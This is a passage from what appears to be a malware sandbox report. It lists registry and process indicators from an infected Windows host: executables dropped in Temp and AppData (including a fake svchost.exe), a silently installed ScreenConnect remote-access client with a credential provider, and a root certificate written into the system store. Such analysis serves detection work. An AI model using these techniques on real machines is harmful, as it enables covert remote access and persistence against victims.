| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\access.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\chcp.com | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\22.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\mod.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\system.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\server.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\jij.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\findstr.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.WindowsClient.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\system32\DrvInst.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" | C:\Program Files (x86)\ScreenConnect Client (0cef7d10d8f459fc)\ScreenConnect.ClientService.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsCredentialProvider.dll" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Version = "402849799" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductIcon = "C:\\Windows\\Installer\\{85F34968-1C69-C400-0998-25E265AEE9E4}\\DefaultIcon" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\sc-0cef7d10d8f459fc\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (0cef7d10d8f459fc)\\ScreenConnect.WindowsClient.exe\" \"%1\"" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32\ThreadingModel = "Apartment" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\ProductName = "ScreenConnect Client (0cef7d10d8f459fc)" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\PackageCode = "86943F5896C1004C9089522E56EA9E4E" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41} | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\InprocServer32 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.3.7.9067\\0cef7d10d8f459fc\\" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-90BB-AB72F266AE41}\ = "ScreenConnect Client (0cef7d10d8f459fc) Credential Provider" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\URL Protocol | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\sc-0cef7d10d8f459fc\UseOriginalUrlEncoding = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E\Full | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\86943F5896C1004C9089522E56EA9E4E | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\86F177BE477A0EA4C0FED7018D4F95CF\86943F5896C1004C9089522E56EA9E4E | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\86943F5896C1004C9089522E56EA9E4E\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a | C:\Users\Admin\AppData\Local\Temp\a\noyjhoadw.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | C:\Users\Admin\AppData\Local\Temp\634977\Surrey.com | N/A |
